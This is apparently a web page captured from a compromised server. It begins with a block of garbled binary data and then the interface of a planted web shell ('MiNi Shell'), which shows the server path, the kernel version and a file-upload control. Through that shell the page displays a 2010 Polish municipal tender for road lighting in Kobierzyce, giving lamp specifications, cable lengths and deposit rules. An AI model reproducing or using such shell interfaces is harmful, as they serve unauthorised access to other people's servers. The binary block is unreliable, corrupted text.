JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100629/169213-N-2010.html

<p class="kh_header"><b>Kobierzyce: Budowa oświetlenia drogowego w wybranych miejscowościach gminy Kobierzyce, na podstawie dokumentacji projektowo-technicznych.</b><br>
<b>Numer ogłoszenia: 169213 - 2010; data zamieszczenia: 29.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oświetlenia drogowego w wybranych miejscowościach gminy Kobierzyce, na podstawie dokumentacji projektowo-technicznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania p/n /Budowa oświetlenia drogowego w wybranych miejscowościach gminy Kobierzyce, na podstawie dokumentacji projektowo-technicznych/ opracowanych przez Biuro Obsługi Inwestycji mgr inż. Rafał Andrzejczak  55-040 Kobierzyce ul. Spotrowa 44 oraz Przedsiębiorstwo Wielobranżowe /FTM/ Tomasz Murmyło 51-212 Wrocław ul. Chmielna 1a i składającej się z: 

1.
A) Projekt budowlany oświetlenia drogowego w m. Ślęza ul. Przystankowa, Rekreacyjna.
B) Projekt wykonawczy oświetlenia drogowego w m. Ślęza ul. Przystankowa, Rekreacyjna.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

2.
A) Projekt budowlany oświetlenia drogowego w m. Ślęza ul. Pszenna, w m. Wysoka ul. Radosna.
B) Projekt wykonawczy oświetlenia drogowego w m. Ślęza ul. Pszenna, w m. Wysoka ul. Radosna.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

3.
A) Projekt budowlany oświetlenia drogowego ul. Pszennej, Rzecznej w m. Ślęza.
B) Projekt wykonawczy oświetlenia drogowego ul. Pszennej, Rzecznej w m. Ślęza.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

4.
A) Projekt budowlano-wykonawczy. Oświetlenie drogowe ul. Irysowa, Sezamkowa, Cisowa, Jaworowa, Działkowa, Wiosenna w m. Wysoka.
B) Szczegółowa Specyfikacja Techniczna
C) Wytyczne BIOZ
D) Przedmiar robót

5. 
A) Projekt budowlany oświetlenia drogowego w m. Tyniec n/Ślęzą ul. Polna.
B) Projekt wykonawczy oświetlenia drogowego w m. Tyniec n/Ślęzą ul. Polna.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

6.
A) Projekt budowlany oświetlenia drogowego w m. Bąki ul. Spacerowa.
B) Projekt wykonawczy oświetlenia drogowego w m. Bąki ul. Spacerowa.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

7.
A) Projekt budowlany oświetlenia drogowego w m. Pustków Żurawski ul. Kolejowa.
B) Projekt wykonawczy oświetlenia drogowego w m. Pustków Żurawski ul. Kolejowa.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

8.
A) Projekt budowlany oświetlenia drogowego w m. Jaszowice ul. Słoneczna.
B) Projekt wykonawczy oświetlenia drogowego w m. Jaszowice ul. Słoneczna.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

9.
A) Projekt budowlany oświetlenia drogowego w m. Domasław ul. Kwiatowa.
B) Projekt wykonawczy oświetlenia drogowego w m. Domasław ul. Kwiatowa.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót

10.
A) Projekt budowlany oświetlenia drogowego w m. Ślęza ul. Szyszkowa.
B) Projekt wykonawczy oświetlenia drogowego w m. Ślęza ul. Szyszkowa.
C) Specyfikacja Techniczna Wykonania i Odbioru Robót
D) Wytyczne BIOZ
E) Przedmiar robót


Zakres rzeczowy zadań. Zamówienie podzielono na 3 zadania (części).
1. Realizacja wg. w/w dokumentacji obejmuje m. in.:
a) Budowa oświetlenia drogowego o długości łącznej  ok. 7692 m w  miejscowościach:  
Zadanie 1 (część 1).
a) Ślęza ul. Przystankowa, Rekreacyjna.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa np. typu ANTARES P 60 9 m z wysięgnikiem o długości 2 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła  np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 788 m.
Ilość opraw 24 sztuk.
Ilość latarni 24 sztuk.

b. Ślęza ul. Pszenna, w m. Wysoka ul. Radosna.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnikiem o długości 2 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Oświetlenia zamieszczonego na rys. 3 i 4 w Projekcie budowlanym nie wykonywać.
Długość linii kablowej ok. 950 m.
Ilość opraw 22 sztuk.
Ilość latarni 22 sztuk.

c. Ślęza - ul. Pszenna, Rzeczna 
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa np. typu ANTARES P 60 9 m z wysięgnikiem o długości 2 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła  np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 539 m.
Ilość opraw 15 sztuk.
Ilość latarni 15 sztuk.

Zadanie 2 (część 2).
a) Wysoka - ul. Irysowa, Sezamkowa, Cisowa, Jaworowa, Działkowa, Wiosenna. 
Oświetlana ulica wymaga oświetlenia klasy ME 6. Oświetlenie odcinka ulicy w oparciu o słupy aluminiowe, malowane o wysokości 4,2 m typu np. INOA. Oprawy sodowe, energooszczędne typu np. INOA. Latarnie wyposażone fabrycznie w tabliczki bezpiecznikowe. Każdą oprawę zasilić przewodem YDY 3x 4,0 mm2/750V.
Długość linii kablowej ok. 1970 m.
Ilość opraw 81 sztuk.
Ilość latarni 81 sztuk.

Zadanie 3 (część 3).
a) Tyniec n/Ślęzą ul. Polna.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 4,5 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa 4,5 m typu np. AURIGA firmy Valmont. Zastosować oprawy sodowe, energooszczędne. Oprawy w standardzie opraw firmy np. THORN typu NELLA 70 W HID 2,5 KV SIL. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 462 m.
Ilość opraw 17 sztuk.
Ilość latarni 17 sztuk.

b) Bąki ul. Spacerowa
Oświetlana ulica wymaga oświetlenia klasy ME 6. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnika 0,5 m firmy np. Valmont. Zastosować oprawy sodowe, energooszczędne.  Oprawy w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN . Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu TBO-35 produkcji WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok.  703 m.
Ilość opraw 20 sztuk.
Ilość latarni 20 sztuk.

c) Pustków Żurawski ul. Kolejowa
Oświetlana ulica wymaga oświetlenia klasy ME5. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnikiem 1 m firmy np. Valmont. Oprawy w standardzie opraw firmy np. THORN typu np.  TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN.
Długość linii kablowej ok.  796 m.
Ilość opraw 22 sztuk.
Ilość latarni 22 sztuk.

d) Jaszowice ul. Słoneczna.
Oświetlana ulica wymaga oświetlenia klasy ME5. Oświetlenie ulicy w oparciu o słupy stalowe ocynkowane o wysokości 6 m bez wysięgnika. Dobór słupa w oparciu o obliczenia dla słupa AURIGA P 60 6 m firmy Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np.  TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 458 m.
Ilość opraw 16 sztuk.
Ilość latarni 16 sztuk.

e) Domasław ul. Kwiatowa.
Oświetlana ulica wymaga oświetlenia klasy ME 4b. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 9 m z wysięgnikiem 1 m. Dobór słupa przeprowadzono w oparciu o obliczenia dla słupa typu np. ANTARES P 60 9 m z wysięgnika 0,5 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 835 m.
Ilość opraw 23 sztuk.
Ilość latarni 23 sztuk.

f) Ślęza ul. Szyszkowa.
Oświetlana ulica wymaga oświetlenia klasy ME5. Oświetlenie odcinka ulicy wykonać w oparciu o słupy stalowe ocynkowane o wysokości 6 m bez wysięgnika. Dobór słupa w oparciu o obliczenia dla słupa np. AURIGA P 60 6 m firmy np. Valmont. Oprawy sodowe, energooszczędne w standardzie opraw firmy np. THORN typu TRIUMH CL2 RALO ESH/GL GRY z odbłyśnikiem np. TRIUMPH1 GT 70 W 230 V HST I i źródłem światła np. MASTER HPS SONT-T PIA Plus 70 W E E27 SLV/12 firmy np. THORN. Latarnie stalowe wyposażyć w tabliczki bezpiecznikowe typu np. TBO-35 produkcji np. WINEL wyposażone w bezpieczniki 6A. Każdą oprawę zasilić przewodem YDY 3x2,5 mm2/750V.
Długość linii kablowej ok. 191 m.
Ilość opraw 6 sztuk.
Ilość latarni 6 sztuk.

Wszystkie urządzenia wbudowane przy realizacji zadania muszą być wykonane z materiałów nieużywanych.
2. Wykonanie pełnej dokumentacji powykonawczej wraz z mapami geodezyjnymi powykonawczymi potwierdzonymi w Zasobie Geodezyjnym - 3 kpl.
Dodatkowe informacje:
 Wykonawca zapewnia stałą, pełną obsługę geodezyjną, w szczególności:
- wytyczenie projektowanych elementów w terenie
- kontrola posadowienia wytyczonych elementów względem granic nieruchomości przylegających do prowadzonej inwestycji (markowanie granic o ustalonych punktach granicznych)
- w miejscach w których brak jest jednoznacznych danych geodezyjnych co do przebiegu granic, okazanie granic w celu jednoznacznego wytyczenia projektowanych elementów
- pomiar powykonawczy z określeniem zgodności przebiegu do dokumentacji projektowej;
 Po stronie Wykonawcy leży spełnienie w imieniu inwestora wszelkich formalności i warunków zawartych w decyzjach i uzgodnieniach, w tym także wykonanie i zatwierdzenie projektu organizacji ruchu - w przypadku konieczności jego sporządzenia, uzyskanie zezwoleń na zajęcie pasów dróg, dokonywanie płatności związanych z decyzjami (w tym również za zajęcia pasa drogowego) i uzgodnieniami.
 Należy wycenić i ująć w wycenie wszystkie koszty związane z realizacją zadania tj. np. wynikające wprost z opisu przedmiotu zamówienia w SIWZ, dokumentacji projektowo-technicznej, specyfikacji technicznych wykonania i odbioru robót, przedmiaru robót jak również inne koszty towarzyszące np.: wszelkich robót przygotowawczych, porządkowych, projektu organizacji placu budowy wraz z jego późniejszą likwidacją, obsługi geodezyjnej (w szczególności: wytyczenie projektowanych elementów w terenie; kontrola posadowienia wytyczonych elementów względem granic nieruchomości przylegających do prowadzonej inwestycji (markowanie granic o ustalonych punktach granicznych); w miejscach w których brak jest jednoznacznych danych geodezyjnych co do przebiegu granic, okazanie granic w celu jednoznacznego wytyczenia projektowanych elementów; pomiar powykonawczy z określeniem zgodności przebiegu do dokumentacji projektowej), koszty utrzymania zaplecza budowy, koszty związane z odbiorami wykonanych robót, koszty wynikające z warunków uzgodnień i decyzji oraz koszty wymiany gruntu, odwodnienia wykopów, naprawy i odbudowy dróg do stanu przed rozpoczęciem robót - w tym także tych dróg lokalnych użytkowanych w trakcie realizacji robót, a których zniszczenia powstały w wyniku przejazdów ciężkiego sprzętu budowlanego Wykonawcy, zagęszczenia gruntu, zajęcia pasa drogowego,  koszty uzyskania niezbędnych decyzji, zezwoleń i pozwoleń. 
 Nadzór archeologiczny zapewnia Gmina Kobierzyce;
 Wykonawca zobowiązany będzie do ścisłej współpracy: z Inspektorem Nadzoru Inwestorskiego; 
 Wykonawca zobowiązany będzie na swój koszt do przeprowadzenia na bieżąco badań zagęszczenia gruntów (w tym podsypki, zasypki) i okazywania ich na żądanie Inspektora Nadzoru Inwestorskiego;
 Wywóz gruntu będzie miał miejsce na składowisko w Tyńcu nad Ślęzą (wraz z jego rozplantowaniem), po wcześniejszym uzgodnieniu w tut. Urzędzie; 
 Wykonawca zobowiązany będzie do przeprowadzenia prac w sposób minimalizujący szkody na przyległych działkach. O terminie wejścia na działkę i prowadzenia prac Wykonawca poinformuje właścicieli działek z 1-tygodniowym wyprzedzeniem;
 Wykonywane prace należy skoordynować z pracami polowymi na gruntach rolnych w obrębie planowanej inwestycji;
 Wykonawca zobowiązuje się w dniu podpisania umowy do dostarczenia Zamawiającemu kompletu dokumentów niezbędnych do zgłoszenia rozpoczęcia robót w Nadzorze budowlanym.

Zamawiający informuje, że wywóz urobku przy robotach ziemnych będzie miał miejsce na teren składowiska w miejscowości Tyniec n/ Ślęzą na podstawie kart odpadów ( wydanych w Urzędzie Gminy Kobierzyce). Składowanie ziemi i gruzu jest nieodpłatne. Wykonawca zapewni własny transport na miejsce przeznaczenia oraz sprzęt do formowania gromadzonego gruntu i poniesie koszty z tym związane. Na teren składowiska nie dopuszcza się zwożenia gałęzi, korzeni itp. 
Jeżeli w SIWZ, dokumentacji projektowo-technicznej, specyfikacjach technicznych wykonania i odbioru robót i przedmiarach robót pojawią się ewentualne wskazania znaków towarowych, patentów lub pochodzenia, to określają one minimalny standard jakości materiałów lub urządzeń przyjętych do wyceny. Wykonawca w takim przypadku może zaoferować przedmioty /równoważne/. Wskazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy. W takim przypadku Wykonawca musi załączyć dane techniczne wykazujące ich parametry oraz odpowiednie obliczenia. Na Wykonawcy leży obowiązek udowodnienia, iż przedstawione w ofercie materiały i urządzenia są równoważne w stosunku do przedstawionych w dokumentacji projektowej. Wykaz materiałów i urządzeń równoważnych wraz z danymi technicznymi wykazującymi ich parametry oraz ewentualnie odpowiednimi obliczeniami winien stanowić załącznik do oferty. Oceny równoważności materiałów i urządzeń Zamawiający będzie dokonywał na etapie oceny ofert. Gdy wystarczajace będą parametry, Zamawiający nie będzie wymagał obliczeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające do wysokości max. 50 % wartości zamówienia podstawowego zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych w zakresie realizacji zadania p/n /Budowa oświetlenia drogowego w wybranych miejscowościach gminy Kobierzyce, na podstawie dokumentacji projektowo-technicznych./</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.14.00-9, 45.31.61.10-9, 45.23.20.00-2, 45.31.43.00-4, 45.23.31.42-6, 45.11.27.10-5, 45.31.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium (przy składaniu ofert) - w kwocie 6.000 zł (zadanie 1), 5.900 zł (zadanie 2), 7.000 zł (zadanie 3) na konto Gminy Kobierzyce:
Al. Pałacowa 1 , 55-040 Kobierzyce konto bankowe  BS Kobierzyce nr  82 95750004 0000 0130 2000 0380 
Wadium wpłacane na konto Zamawiającego powinno mieć adnotację -- nazwę przetargu. Potwierdzenie wniesienia wadium  (może być to kserokopia potwierdzoną przez Wykonawcę za zgodność z oryginałem należy dołączyć do oferty. Wadium w postaci gwarancji i poręczeń złożyć w oryginale w kasie, a potwierdzoną /za zgodność/ kserokopię dołączyć do oferty.
Zgodnie z art. 45 ust. 3 ustawy Prawo zamówień publicznych wadium musi być wniesione najpóźniej do wyznaczonego w SIWZ terminu składania ofert .
Wniesienie wadium w formie poręczenia lub gwarancji będzie skuteczne, jeżeli do wskazanego terminu zostanie ono zdeponowane w kasie Urzędu Gminy Kobierzyce - pok. 22.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli do wskazanego terminu znajdzie się ono na podanym rachunku bankowym Zamawiającego.
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu (przelew na rachunek bankowy Zamawiającego);
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, powinny one być sporządzone zgodnie z przepisami prawnymi i powinny zawierać wskazany niżej element:
- zobowiązanie Gwaranta do /zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:
-Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie, albo
- Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach określonych w ofercie, albo
- Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, albo
- Zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy/   
Wadium   wnoszone   w   pieniądzu   wpłaca   się   przelewem   na   rachunek   bankowy   wskazany   przez Zamawiającego.
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
d)  Z zastrzeżeniem pkt. 8, Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy:
- który wycofał ofertę przed upływem terminu składania ofert;
- który został wykluczony z postępowania;
- którego oferta została odrzucona.
Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia protestu.
Zamawiający zatrzymuje wadium, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówi podpisania umowy lub zawarcie umowy jest niemożliwe z przyczyn leżących po stronie wykonawcy albo nie wniósł zabezpieczenia umowy.
Oferta w trakcie trwania procedury od terminu składania ofert podanego w SIWZ poprzez wybór oferty do terminu podpisania umowy (termin związania ofertą 30 dni) winna być przez cały okres zabezpieczona wadium.</p>
